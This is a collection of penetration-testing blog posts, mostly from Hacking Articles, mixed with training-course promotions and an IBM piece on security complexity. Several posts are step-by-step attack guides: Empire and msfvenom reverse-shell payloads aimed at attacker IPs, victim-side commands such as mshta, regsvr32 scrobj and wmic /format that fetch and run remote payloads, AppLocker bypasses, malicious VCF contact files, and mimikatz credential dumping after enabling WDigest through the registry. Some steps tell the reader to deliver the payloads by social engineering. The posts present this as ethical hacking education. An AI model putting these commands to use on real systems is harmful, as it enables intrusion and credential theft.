Category Archives: penetration testing

TrevorC2 – Command and Control

TrevorC2 is command and control framework. It is a client/server model which works through a browser masquerading as C2 tool. It works on different time intervals which makes it almost impossible to be detected. This tool is coded in python but it’s also compatible with c#, PowerShell, or any other platform. this is supported by both Windows and MacOS along with Linux. It is very easy and convenient to use.

You can download it from

https://github.com/trustedsec/trevorc2

Once its downloaded, open the folder and then open trevorc2_server.py file and change the IP to your localhost IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.

Then, start and run trevorc2 framework.

Once the trevorc2 is up and running, change the IP to your localhost IP in trevorc2.ps1 file.

Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :

To see the sessions type :

list

And to access this session type :

interact <serial number od session>

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post TrevorC2 – Command and Control appeared first on Hacking Articles.

Bypass Application Whitelisting using cmstp

By default, Applocker allows the executing of binaries in the folder that is the major reason that it can be bypassed. It has been found that such binaries can easily be used in order to bypass Applocker along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP welcomes INF files and so exploitation through INF is possible. And so, we will be learning how to perform such exploitation.

As we all know CMSTP accepts SCT files and runs then without suspicion and therefore we will create a malicious SCT file to reach our goal.  We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click here.

Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :

listeners
uselistener http
set Host 192.168.1.109
execute

Above commands will create a listener for you, then type back to return from listener interface and as for the creation of SCT file type :

usestager windows/launcher_sct
set Listener HTTP
execute

Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.

Download this script from here:

 

Now, send the file to the victim’s PC and run the following command in victims’ command prompt :

cmstp.exe /s shell.inf

As soon as you run the command, you will have a session. Use the following command to access your session :

interact <session name>

This way, you can use CMSTP binary to bypass applocker restrictions. CMSTP needs an INF file and by using it to your advantage you can have access to victim’s PC.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass Application Whitelisting using cmstp appeared first on Hacking Articles.

Red Team/Blue Team Practice on Wdigest

In this article, we will show you the methods of protecting your system against MIMIKATZ that fetches password in clear text from wdigest. As you know the Pen-tester and the red team uses mimikatz for testing password capacity. For the complete information on how mimikatz works visit this link:

https://www.hackingarticles.in/understanding-guide-mimikatz/

Table of Contents

  • Introduction
    • System impacted
  • Demonstration on Windows 7
    • Disable WDigest (defending against mimikatz)
  • Demonstration on Windows 10
    • Enable WDigest in Windows 10
    • Enable WDigest via the registry key

Introduction of WDigest

WDigest.dll was introduced in the Windows XP operating system. in Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol is used for clients to send clear text credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. When the WDigest authentication protocol is enabled, clear text password is stored, where it can be at risk of theft.

System Impacted

The problem with WDigest is that it stores passwords in memory in clear-text and it can be extracted by using MIMIKATZ. The following OS’s are impacted: Windows 7, Windows 8, Windows 8.1, Windows Server 2008, Windows Server 2008R2, and Windows Server 2012.

Demonstration on windows 7

An attacker with administrator privileges can steal credentials from damaged system memory. Memory credentials are stored in plain text and in various hash formats. First, we will demonstrate how we can see the password of Windows 7 using MIMIKATZ tool as shown in the image below as it has shown the password in the clear text. And for this, we will following commands in MIMIKATZ tool

privilege::debug
sekurlsa::wdigest

Now as you can observe that is has shown you the password in clear text. We can also do this by taking the meterpreter of the target system and then using MIMIKATZ in Kali. Here you will see that it has also shown us the password of the compromised system.

Disable WDigest (Defending against Mimikatz)

Now as we know that it is a security threat; so now we will get to know how we can remove this from our system and for this a registry change is required to make to hide our password. For this, we will first open the regedit and then go to WDigest option using the following path

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest

Here you need to open the security packages and you will see WDigest with the other options as shown in the image below

Great! You have found that. Now simply you need to remove Wdigest from here so that nobody can see the password using MIMIKATZ tool.

Now after making these changes, we need to update the group policy and reboot the system. After doing so we will again use MIMIKATZ tool to see the change now. So we will use the same commands which we have used earlier to get the password and this time it will show us the password NULL as shown in the image.

Great! We have successfully hidden the password. Now, if somebody has taken the meterpreter of the Windows 7 and if the attacker tries this in kali using MIMIKATZ tool there. Even then the attacker is not able to get the password of the compromised system as shown in the image below

Demonstration on Windows 10

In the same way, we will try this method in Windows 10 and as we know that in Windows 10 it is disabled by default. We can verify this by using the MIMIKATZ tool there.

 

Enable WDigest in Windows 10

Yes; as we have verified that the Wdigest option is disabled by default. Now we will learn how we can enable Wdigest in Windows 10. For this first, we need to take meterpreter of the target system and then we need to take the admin access of the system and then we need to use the exploit to enable Wdigest in the target system with the help of the following module.

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider’s Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system’s memory.

use post/windows/manage/wdigest_caching
msf post(windows/manage/wdigest_caching) > set session 2
msf post(windows/manage/wdigest_caching) > exploit

After making the changes we will check if the Wdigest option is enabled. For this, we will again use MIMIKATZ tool here and we will observe that we have found the password of the victim’s P.C

We can do this too by taking the meterpreter of the system using MIMIKATZ tool there.

Enable Wdigest via a registry key

There is one more way to see the password. The second method to enable WDigest is by taking the shell of the compromised system. Now run the following command to enable the wdigest.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

After you get the shell; you need to run Mimikatz tool here and we will use the same commands to see the password. And you will observe that we have got the password.

Excellent we have done this with this method also. And we know that how to see the password in Windows 10 and how to enable and disable that.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Red Team/Blue Team Practice on Wdigest appeared first on Hacking Articles.

Introduction to Pentesting: From n00b to Professional

So, you want to become a pentester? Penetration testing not only is a financially rewarding career, but professionals in this field also believe this career path to be personally fulfilling. Although, it requires some serious skills to get there! Here’s an introduction to penetration testing and how to take your first step in this field.

Why Penetration Testing Is Important

Penetration testing (pentesting) consists of testing a computer system, network, web application, etc. to find security vulnerabilities before malicious actors do. In other words, Penetration Testers perform ‘deep investigations’ of the remote system security flaws.

This activity requires methodology and skills. Penetration testers, unlike malicious hackers, must test for any and all vulnerabilities, not just the ones that might grant them root access to a system.

Penetration testing is NOT about getting root!!!

The ultimate goal of penetration testers is not to get access as fast as possible, but to thoroughly identify the security posture of an organization, and recommend the right solution/s to fix the vulnerabilities found.

The most important part of the penetration testing methodology — the reporting phase — is often the most looked-upon. That’s a BIG mistake! Indeed, clients will usually judge a pentester’s work based on the quality of his report. This is why writing skills can really come in handy, but more on the skills necessary to succeed in this field later in this article.

Penetration testers, moreover, cannot destroy their clients’ infrastructures. Pentesting requires a thorough understanding of attack vectors and their potential.

In a world ever-more connected, everything can be tested. Here are some of the most common types of pentests:

  • Network Pentesting,
  • Wireless Network Pentesting,
  • Web Application Pentesting,
  • Mobile Application Pentesting,
  • Wifi Pentesting,
  • System Pentesting,
  • Servers Pentesting,
  • IoT Pentesting,
  • Cloud-based Application Pentesting,

But also…

  • Human/Employees can be an organization’s weakest link. To ensure that all employees aware of their risks, and to keep a company secure, Penetration Testers might be asked to perform Social Engineering tests.

Learn the basics of social engineering and how to use popular credential grabbing tools like Modlishka and SET in this webinar by The Ethical Hacker Network and Erich Kron of KnowBe4.

Needless to say, pentesting is a highly practical job! To become a Penetration Tester, you’ll need to learn the theories, methodologies, and most importantly, the hands-on techniques to carry on your tasks.

Below are some of the most important skills to get you started.

The Skills Penetration Testers Need To Succeed

To become a junior penetration tester, you’ll need to have a strong understanding of the networking basics:

  • Routing, Forwarding, TCP/IP
  • Traffic analysis with Wireshark

But also know the pentesting methodology:

  • Information gathering
  • Footprinting and scanning
  • Vulnerability assessments
  • Exploitation 
  • Reporting

And most importantly, know the most common hacking techniques and tools by heart:

  • How web attacks works
  • Basic usage of Nmap, Nessus, BurpSuite, and Metasploit
  • Understanding Buffer Overflows
  • How XSS and SQL Injection work
  • How to hack the human brain (social engineering)

Want to learn the skills and techniques mentioned above? Skip to the next part to see how you can get started.

How To Get Started?

So, you want to become a penetration tester? You might just be in luck!

In the occasion of our Beginners’ Month, we are offering the Penetration Testing Student (PTS) training course in Elite Edition for free with every enrollment in the Penetration Testing Professional (PTP) training course.

Combined together, these two of our best-selling training courses will take you from script kiddie to a more advanced and professional penetration tester level.

We pride ourselves in offering highly practical and self-paced training courses, so you’ll be able to learn new penetration testing skills and techniques from the comfort of your home, at your own pace.

By enrolling in these two courses, you’ll get lifetime access to

  • Thousands of slide course materials,
  • Hundreds of video course materials,
  • Hours of virtual labs based on real-life scenarios,
  • A shiny certificate to prove your practical skills!

Yes, that’s right! You’ll get the chance to prove your skills and become certified eLearnSecurity Junior Penetration Tester (eJPT) after completing the PTS training course and eLearnSecurity Certified Professional Penetration Tester (eCPPT) after the PTP training course.

Aspiring to become a professional Penetration Tester? Enroll in PTPv5 in Elite Edition before February 28 to receive PTS in Elite Edition at no additional cost!
CLAIM YOUR FREE COURSE | GET A FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

What do successful pentesting attacks have in common?

In external penetration testing undertaken for corporate clients in industrial, financial, and transport verticals in 2018, Positive Technologies found that, at the vast majority of companies, there were multiple vectors in which an attacker could reach the internal network. Full control of infrastructure was obtained on all tested systems in internal pentesting. In addition, the testers obtained access to critical resources such as ICS equipment, SWIFT transfers, and ATM management. These statistics are based on … More

The post What do successful pentesting attacks have in common? appeared first on Help Net Security.

Bypass Application Whitelisting using Weak Path Rule

Finding loopholes is very important when you are the part of a pen-testing team. Because such loopholes are the source of hacking as the attacker will actively look for them. So in order to patch such loopholes, you must know how to and where to find them. One of such loopholes is something known as weak folders in windows.

To secure windows, there are multiple security policies provided by Microsoft. One of such policies does not allow an exe file to execute which means a malicious exe file that can be sent by an attacker will not work in the targeted PC. To apply such policy, you need to go into the local security policy of windows > Applocker > executable rules > and then apply the policy. As you can see in the image below the default rule has been set.

Now, if you try to run any given .exe file, it will not run. Here, I have tried to execute putty.exe file but as you can see in the image below it does not run.

The loophole to this policy is that there still few folders, which despite of activated security policies, has write and read permission and such files will execute from these folders. If I run the same exe i.e. putty.exe in the C drive > windows > tasks folder then it will be executed as shown in the image below.

To check which folders have read and write permission, you can use the following command:

accesschk64.exe "Users" c:/Windows -w

using this command, you can see in the following image that everywhere the access is denied except for the temp, task and tracing folders.

Now let’s experiment with a malware which we will create using msfvenom for the targeted PC with the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

When you execute the above malware in the victims’ PC, it will not run due to the applicable security policies.

But, if using the loophole, you execute the file from the tasks folder as shown in the image below:

Then, you will have your meterpreter session as desired.

So, while providing security or attacking you must know everything about the targeted machine so that you can use their security against them or provide even better security by patching such loopholes.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass Application Whitelisting using Weak Path Rule appeared first on Hacking Articles.

Multiple Ways to Exploiting Windows PC using PowerShell Empire

This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here.

Table of content:

  • Exploiting through HTA
  • Exploiting through MSBuild.exe
  • Exploiting through regsvr32
  • XSL exploit
  • Exploiting through visual basic script
  • BAT exploit
  • Multi_launcher exploit

Exploiting through HTA

This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here.

To run type ‘./Empire’.

According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command:

listeners

After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.  So in this listener interface, type :

uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type :

usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file:

python -m SimpleHTTPServer 8080

As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file:

mshta.exe http:/192.168.1.107:8080/1.hta

The moment above command is executed you will have your session, to access the session type :

interact XDGM6HLE
sysinfo

Exploiting through MSBuild.exe

Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type:

listeners
uselistener http
set Host http:/192.168.1.107
execute

This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type :

usestager windows/launcher_xml
set Listener http
execute

Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

So, this way you will have your session, to access the said session type :

interact A8H14C7L
sysinfo

Exploiting through regsvr32

Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command:

listeners
uselistener http
set Host http://192.168.1.107
execute

Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type:

usestager windows/launcher_sct
set Listener http
execute

 

This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command:

regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Thus, you will have an active session. To access the session type:

interact <session name>
sysinfo

Exploiting through XSL

XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file.  For this method lets activate our listener first by typing :

listeners
uselistener http
set Host http://192.168.1.107
execute

As the listener is up and running, create your exploit :

usestager windows/launcher_xsl
set Listener http
execute

This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below :

cd /tmp
python -m SimpleHTTPServer 8080

Now execute the following command in the command prompt of your victim:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

Running above will give a session, to access the session type :

interact <session name>
sysinfo

Exploiting through Visual Basic script

Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first.

listeners
uselistener http
set Host http://192.168.1.107
execute

Now, to create our malicious .vbs file type :

usestager windows/launcher_vbs
set Listener http
execute

Next step is to start the python server by typing:

python -m SimpleHTTPServer 8080

Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type :

interact <session name>
sysinfo

Exploiting through .bat

In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type:

listeners
uselistener http
set Host http://192.168.1.107
execute
back

The above commands will create a listener for you. Let’s create our .bat file using following command :

usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute

As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc.

python -m SimpleHTTPServer 8080

Once you run the .bat file, a session will activate. To access the session type:

interact <session name>
sysinfo

Multi_launcher

This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener:

listerners
uselistener http
set Host http://192.168.1.107
execute

Then type following commands for create your malicious file:

usestager multi/launcher
set listerner http
execute

Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type:

interact <session name>
sysinfo

Conclusion

The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy!

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Multiple Ways to Exploiting Windows PC using PowerShell Empire appeared first on Hacking Articles.

Jenkins Pentest Lab Setup

You all know that we have performed so many ctf challenges and we got to know about jenkins there.so lets know about jenkins better. For this we are here with the new challenges which you will face performing ctf challenges.to do it in a easier way we are here with a new article.so let’s do it.

Table of Content

Introduction of Jenkins

Lab setup

  • Install java
  • Import the GPG keys
  • Add the Jenkins repository
  • Install Jenkins
  • Setup Jenkins

Jenkins penetration testing

Exploiting Groovy Script

Introduction of Jenkins

Jenkins is an open source automation server written in Java that offers a simple way to set up a continuous CI / CD pipeline.  It supports version control tools,including AccuRevCVSSubversionGitMercurialPerforceTD/OMSClearCase and RTC, and can execute Apache AntApache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. The creator of Jenkins is Kohsuke Kawaguch. Jenkins achieves Continuous Integration with the help of plugins. Plugins allows the integration of Various DevOps stages. If you want to integrate a particular tool, you need to install the plugins for that tool. For example: Git, Maven 2 project, Amazon EC2, HTML publisher etc.

Lab setup

Install Java

Now we need to install Jenkins and for this it is mandatory that you are logged in from sudo user or root. Because Jenkins is a Java application, installing Java is the first step. Update the package index and install the OpenJDK Java 8 package using the following commands:

sudo apt update
sudo apt install openjdk-8-jdk

Import the GPG keys

wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -

Install Jenkins

When the key is added, the system returns all right. Next, add the Debian package repository to the source list of the server:

sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list'
sudo apt update

The Jenkins version with the default Ubuntu packages is often behind the project’s latest version. You can use project-maintained packages to install Jenkins to take advantage of the latest fixes and features. Now open the kali terminal and install Jenkins from the given link below-

sudo apt install Jenkins
sudo ufw allow 8080

You can use its status command to check that Jenkins has successfully started.

systemctl status jenkins

Visit Jenkins on its default port 8080 to set up your installation using your server domain name or IP address: http:/your server ip or domain:8080

You should see the Unlock Jenkins screen displaying the location of the initial password:

In the terminal window, you need to use the cat command to display the password:

Copy the password from your terminal

sudo cat /var/lib/jenkins/secrets/initialAdminPassword

Copy the password from your terminal and paste it into the Administrator password field and click Continue.

On the next page, you will be asked if you want to install suggested plugins or if you want to select specific plugins. Click the Install suggested plugins box and start the process of installation plugin instantly.

In my case it took so much time to get all plugin installed successfully. 

Once the installation is completed, you will get another page to create First Admin user account, fill the all essential details and click on “Save and Continue”.

You will see a confirmation page that “Jenkins is ready”. To visit Jenkins main dashboard, click Start using Jenkins Click Save and Finish after confirming the corresponding information.

That’s wonderful! You have successfully installed Jenkins on your system.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Jenkins Pentest Lab Setup appeared first on Hacking Articles.

#MyInfoSecStory Contest: Win The Course Of Your Choice

Has eLearnSecurity or one of our training courses helped you or your career? We’d love to know that story! Get a chance to win your favorite course this month with our #MyInfoSecStory LinkedIn contest. Discover how to enter and the guidelines for your chance win below.

Reading from a mobile? Click on the Infographic to enlarge it.

Get your keyboards in order — Ready, set, go!

Click the links below to share this contest with your friends and colleagues:
.LINKEDIN.  |  .TWITTER.  🐦

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Exploiting Windows using Contact File HTML Injection/RCE

After the 0 day exploit on malicious VCF file in windows, cyber security researcher John Page deserves another round of applause for bringing this vulnerability onto exploit-db’s eye on 23rd January 2019. This vulnerability further exploits the RCE vulnerability present in VCF with HTML injections. To read the previous article follow the link here.

Introduction: The idea here is to include a malicious VBScript file into the email section of the VCF file so as to locally execute a script instead of opening the email via mailto. We’ll be using the anchor tag (<a>) of HTML to achieve the aforementioned task. This vulnerability is classified by John under “Mailto: HTML Link Injection Remote Code Execution”. To read more about the discovery and origin, follow the link here.

Methodology:

  • Making an msfvenom payload of a .vbs format.
  • Sending the VBS file to victim.
  • Creating a VCF file in the parent folder.
  • Adding an email into the contact with HTML injection parameters.
  • Running multi/handler in a separate window.
  • Opening email in the VCF file.
  • Spawning meterpreter.

So, without any further ado, let’s dive right into it.

Proof of Concept:

The first step would be to make a payload with a vbs extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In my case, the local IP address is 192.168.1.109

Once the payload is made, transfer the .vbs file into victim’s PC.

Next and the most important step is to make a contact VCF file. You can download a sample VCF too and add a website but we made a new contact file. The system we are using is Windows 10 so the version of VCF file may differ from yours but it would work just the same. Once the contact file is made, under the e-mail tab, add the HTML injection like:

<a href="raj\shell.vbs">raj@gmail.com</a>

Mind here that our parent folder’s name is “Raj” and the malicious VBS file is “shell.vbs”.

Now you’ll have to add this email address by clicking on the add button. As you can see it would look something like this:

Once the email address gets added, you’ll have to save the contact file. The final VCF file is going to look something like this:

By the aforementioned HTML injection tag, we are prompting a local inclusion instead of a mail prompt. This will run the malicious code and thereby, theoretically would spawn meterpreter. So, as soon as we add the mail in the VCF file, Windows will prompt you like “The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?” Click yes.

When you click on the mail in the final processed VCF file, you’d probably have opened a new meterpreter session.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Exploiting Windows using Contact File HTML Injection/RCE appeared first on Hacking Articles.

Top 8 Tools Every Ethical Hacker Should Know [Infographic]

Ethical Hackers rely on a variety of tools to test their clients’ systems, networks, and applications. Find out what are the most commonly used tools that every ethical hacker should know.

Reading from a mobile? Click on the Infographics to have it fit your screen.

Want to learn how to use these pentesting tools? Get a free trial of our Penetration Testing Professional (PTP) training course to learn how to perform detailed enumeration, privilege escalation and restricted shell escaping:
GET FREE DEMO

Connect with us on Social Media to stay tuned about new blog posts and special offers!

Twitter | Facebook | LinkedIn | Instagram

Exploiting Windows PC using Malicious Contact VCF file

A huge shoutout to cyber security researcher John Page for bringing this vulnerability into the internet’s eye on 15th January 2019. This was a 0 day exploit and of course works with the latest windows 10 too. It is categorized under “Insufficient UI warning remote code execution” vulnerability.

Introduction: Basically what John discovered was that if we replaced the website in a VCF file with the local path of a CPL file, it tends to install that file instead of opening it on browser. This is done by replacing the “http://” with “http.\\”, which is totally insane since a user would need the eyes of multi mega pixels to discover an intentional path error of that kind! So all we need to do is to send the victim that VCF file along with our CPL file in a folder named “http” (it has to be http only for local path inclusion) and we shall get a shell.

To read more about the research follow the link here.

Methodology:

  • Making an msfvenom windows payload with .dll extension.
  • Sending the dll file in a folder named “http”.
  • Creating a contact file in the parent folder of “http”.
  • Adding a website into the contact.
  • Changing the prefix of website from http:// to http.\\
  • Renaming the dll file to “<name of website>.cpl”
  • Running multi handler in a window
  • Opening the website path from the contact
  • Spawning shell.

Proof of Concept:

The first step would be to make a payload with a dll extension. For this purpose we are using msfvenom’s windows payload but any other payload should work just fine.

In this case my local IP address is 192.168.1.109.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll

Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else since we are including a path later on in the website link. And it has to be in the current directory too. So we copy this shell.dll file into the victim machine.

Next and the most important step is to make a contact VCF file. You can download a sample vcf too and add a website but we made a new contact file. The system we are using is windows 10 so the version of VCF file may differ from yours but it would work just the same.

Add any name in the contact file.

I added Raj Chandel.

Traverse to the next tab home and you’ll see a text box to input a website. Add any website’s name as you desire. I added my website’s name “hackingarticles.in” but here is the most important thing you have to note here:

A generic website’s link is https://www.hackingarticles.in but we modify the prefix just a little by replacing the http:// with http.\\

This is because we don’t actually want to include a website but we want to include a path to our DLL file so that when the victim click’s on the website, our DLL should run.

Here, we are suffixing the website link with “.cpl” extension. A CPL file is a control panel item, such as Displays, Mouse, Sound, or Networking, used by the Windows operating system.

Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”

Now we are prepped and ready to run the DLL file so we set up multi/handler on a terminal window and opened the contact on victim’s machine.

As soon as we click on the link here, we will see a session is obtained in the kali terminal!

This spawns a shell of the current user of windows that is logged on.

Conclusion: This is an amazing vulnerability discovered by John Page and all the working versions of windows that support contact VCF files are affected by it. As you can see we have spawned a windows 10 shell here, it is safe to say lower versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Exploiting Windows PC using Malicious Contact VCF file appeared first on Hacking Articles.

Pros & Cons of a Career in Cybersecurity

Cybersecurity is becoming an increasingly popular career choice. Why, you wonder? Read below to find out what InfoSec professionals say are the pros and cons of a career in this field.

Reading from a mobile? Click on the image to fit your screen.

Sources: IT GovernanceBeyond TrustQuora

Aspiring to learn modern penetration testing skills and techniques? Check out our Penetration Testing Professional (PTP) training course, or get your free trial below.
GET FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Break Through Cybersecurity Complexity With New Rules, Not More Tools

Let’s be frank: Chief information security officers (CISOs) and security professionals all know cybersecurity complexity is a major challenge in today’s threat landscape. Other folks in the security industry know this too — although some don’t want to admit it. The problem is that amid increasing danger and a growing skills shortage, security teams are overwhelmed by alerts and the growing number of complex tools they have to manage. We need to change that, but how? By completely rethinking our assumptions.

The basic assumption of security up until now is that new threats require new tools. After 12 years at IBM Security, leading marketing teams and making continuous contact with our clients — and, most recently, as VP of product marketing — I’ve seen a lot of promising new technology. But in our rapidly diversifying industry, there are more specialized products to face every kind of threat in an expanding universe of attack vectors. Complexity is a hidden cost of all these marvelous products.

It’s not just security products that contribute to the cybersecurity complexity conundrum; digitization, mobility, cloud and the internet of things (IoT) all contribute to the complexity of IT environments, making security an uphill battle for underresourced security teams. According to Forrester’s “Global Business Technographics Security Survey 2018,” 31 percent of business and IT decision-makers ranked the complexity of the IT environment among the biggest security challenges they face, tied with the changing nature of threats as the most-cited challenge.

I’ll give you one more mind-boggling statistic to demonstrate why complexity is the enemy of security: According to IBM estimates, enterprises use as many as 80 different security products from 40 vendors. Imagine trying to build a clear picture with pieces from 80 separate puzzles. That’s what CISOs and security operations teams are being asked to do.

7 Rules to Help CISOs Reduce Cybersecurity Complexity

The sum of the parts is not greater than the whole. So, we need to escape the best-of-breed trap to handle the problem of complexity. Cybersecurity doesn’t need more tools; it needs new rules.

Complexity requires us as security professionals and industry partners to turn the old ways of thinking inside out and bring in fresh perspectives.

Below are seven rules to help us think in new ways about the complex, evolving challenges that CISOs, security teams and their organizations face today.

1. Open Equals Closed

You can’t prevent security threats by piling on more tools that don’t talk to each other and create more noise for overwhelmed analysts. Security products need to work in concert, and that requires integration and collaboration. An open, connected, cloud-based security platform that brings security products together closes the gaps that point products leave in your defenses.

2. See More When You See Less

Security operations centers (SOCs) see thousands of security events every day — a 2018 survey of 179 IT professionals found that 55 percent of respondents handle more than 10,000 alerts per day, and 27 percent handle more than 1 million events per day. SOC analysts can’t handle that volume.

According to the same survey, one-third of IT professionals simply ignore certain categories of alerts or turn them off altogether. A smarter approach to the overwhelming volume of alerts leverages analytics and artificial intelligence (AI) so SOC analysts can focus on the most crucial threats first, rather than chase every security event they see.

3. An Hour Takes a Minute

When you find a security incident that requires deeper investigation, time is of the essence. Analysts can’t afford to get bogged down in searching for information in a sea of threats.

Human intelligence augmented by AI — what IBM calls cognitive security — allows SOC analysts to respond to threats up to 60 times faster. An advanced AI can understand, reason and learn from structured and unstructured data, such as news articles, blogs and research papers, in seconds. By automating mundane tasks, analysts are freed to make critical decisions for faster response and mitigation.

4. A Skills Shortage Is an Abundance

It’s no secret that greater demand for cybersecurity professionals and an inadequate pipeline of traditionally trained candidates has led to a growing skills gap. Meanwhile, cybercriminals have grown increasingly collaborative, but those who work to defend against them remain largely siloed. Collaboration platforms for security teams and shared threat intelligence between vendors are force multipliers for your team.

5. Getting Hacked Is an Advantage

If you’re not seeking out and patching vulnerabilities in your network and applications, you’re making an assumption that what you don’t know can’t hurt you. Ethical hacking and penetration testing turns hacking into an advantage, helping you find your vulnerabilities before adversaries do.

6. Compliance Is Liberating

More and more consumers say they will refuse to buy products from companies that they don’t trust to protect their data, no matter how great the products are. By creating a culture of proactive data compliance, you can exchange the checkbox mentality for continuous compliance, turning security into a competitive advantage.

7. Rigidity Is Breakthrough

The success of your business depends not only on customer loyalty, but also employee productivity. Balance security with productivity by practicing strong security hygiene. Run rigid but silent security processes in the background to stay out of the way of productivity.

What’s the bottom line here? Times are changing, and the current trend toward complexity will slow the business down, cost too much and fail to reduce cyber risk. It’s time to break through cybersecurity complexity and write new rules for a new era.

Discover Outcome-driven security solutions for the enterprise

The post Break Through Cybersecurity Complexity With New Rules, Not More Tools appeared first on Security Intelligence.

GreatSct – An Application Whitelist Bypass Tool

While wrting Applocker bypass series, we found a new tool which was especially design for bypassing whitelisting application.  So Idecided to write this article where e are introducing another most interesting tool “Great SCT –A metasploit payload generator” tool which is similar to unicorn or msfvenom because it depeands on metasploit framework to provide reverse connection of victim’s machine. So let’s began with its tutorial and check its functionality.

Table of Content

  • GreatSCT
  • Installation & Usages
  • Generate malicious hta file
  • Generate malicious sct file
  • Generate malicious dll file

GreatSCT

GreatSCT is current under support by @ConsciousHacker, the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

It must first be downloaded and installed in order to start using Great SCT. Run following command to download Great SCT from github and also take care of its dependency tools while installing it.

This help to bypass Applocker policy by using following tools:

  • exe The Installer tool is a command- line tool that lets you to install and uninstall server resources in specific assemblies by running the installer components.
  • exe : The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild.
  • exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with.
  • exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently. 
